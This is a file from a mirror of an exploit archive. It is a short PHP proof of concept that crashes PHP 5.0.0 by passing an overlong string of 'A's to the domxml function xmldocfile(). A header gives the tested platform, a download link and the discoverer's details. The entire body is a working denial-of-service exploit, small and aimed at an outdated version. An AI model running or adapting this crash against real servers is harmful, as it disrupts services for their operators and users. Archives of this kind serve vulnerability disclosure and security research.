exploit-db-mirror/platforms/php/dos/40306.php
Offensive Security 760d823bc8 DB: 2016-08-30
18 new exploits

Too many to list!
2016-08-30 05:08:40 +00:00

15 lines
No EOL
626 B
PHP
Executable file

<?php
#############################################################################
## PHP 5.0.0 xmldocfile() Local Denial of Service
## Tested on Windows Server 2012 R2 64bit, English, PHP 5.0.0
## Download @ http://museum.php.net/php5/php-5.0.0-Win32.zip
## Date: 26/08/2016
## Local Denial of Service
## Bug discovered by Yakir Wizman (https://www.linkedin.com/in/yakirwizman)
## http://www.black-rose.ml
#############################################################################
if (!extension_loaded("domxml")) die("You need domxml extension loaded!");
$str = str_repeat('A', 9999);
xmldocfile($str);
?>